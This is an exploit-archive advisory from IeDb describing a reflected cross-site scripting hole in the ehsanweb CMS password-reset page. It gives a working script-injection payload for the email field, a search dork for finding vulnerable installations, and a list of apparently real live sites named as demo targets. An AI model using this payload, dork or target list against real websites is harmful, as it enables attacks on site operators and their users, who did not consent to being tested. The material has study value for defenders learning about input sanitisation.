ehsanweb CMS Cross-Site Scripting Vulnerability
2014-08-29 17:55:57Posted by: irist.ir
#################################
#
# @@@ @@@@@@@@@@@ @@@@@ @@@@@@@@@@ @@@ @@@@@@@
# @@@ @@@@@@@@@@@ @@@ @@ @@@ @@ @@@ @@@@@@@@
# @@@ @@@ @@@ @@ @@@ @@ @@@ @@@ @@@
# @@@ @@@ @@@ @@ @@@ @@ @@@ @@@ @@@
# @@@ @@@@@@@@@@@ @@@ @ @@@@@@@@@@ @@@ @@@@@@
# @@@ @@@@@@@@@@@ @@@ @@ @@@ @@ @@@ @@@@@@
# @@@ @@@ @@@ @@ @@@ @@ @@@ @@@ @@@ @@@
# @@@ @@@ @@@ @@ @@@ @@ @@@ @@@ @@@ @@@
# @@@ @@@@@@@@@@@ @@@@@ @@@@@@@@@@ @@@ @@@ @@@ @@@
#
#####################################
#####################################
# Iranian Exploit DataBase
# ehsanweb CMS Cross-Site Scripting Vulnerability
# Vendor site : http://www.ehsanweb.com
# Dork : "طراØÙ� Ù� برÙ�اÙ�Ù� Ù�Ù�Ù�سÙ�: اØساÙ� Ù�ب"
# Author : IeDb
# Site : Www.IeDb.Ir/acc - Www.IrIsT.Ir
# Fb Page : https://www.facebook.com/iedb.ir
#####################################
Bug :
http://www.site.com/admin/forgetpassword.php
POST :
email="><script>alert(/amir/)</script>
Image : http://upload.tehran98.com/upme/uploads/1ed2e1296fe441df1.jpg
Dem0 :
http://www.ehsanweb.com/admin/forgetpassword.php?process
http://pgshco.com/admin/forgetpassword.php?process
http://www.sapno.ir/admin/forgetpassword.php?process
http://abzarmajid.com/admin/forgetpassword.php?process
http://www.danavc.com/admin/forgetpassword.php?process
http://lotuscard.ir/admin/forgetpassword.php?process
http://www.asregorgan.ir/admin/forgetpassword.php?process
#####################################
# Greats : Bl4ck M4n - ErfanMs - 4ntr4x - N20 - Bl4ck N3T - dr.koderz - Enddo - E1.Coders - Behnam Vanda
# E2MA3N - l4tr0d3ctism - H-SK33PY - sole sad - r3d_s0urc3 - Dr_Evil - z3r0 - 0x0ptim0us - 0Day
# Security - ARTA - ARYABOD - Mr.Time - C0dex - Det3cT0r - yashar shahinzadeh - Khashayar
# tootro20 - AmirMasoud And All Members In IeDb.Ir/acc
#####################################
# Archive Exploit = http://www.iedb.ir/exploits-1903.html
#####################################
Fixes
No fixesIn order to submit a new fix you need to be registered.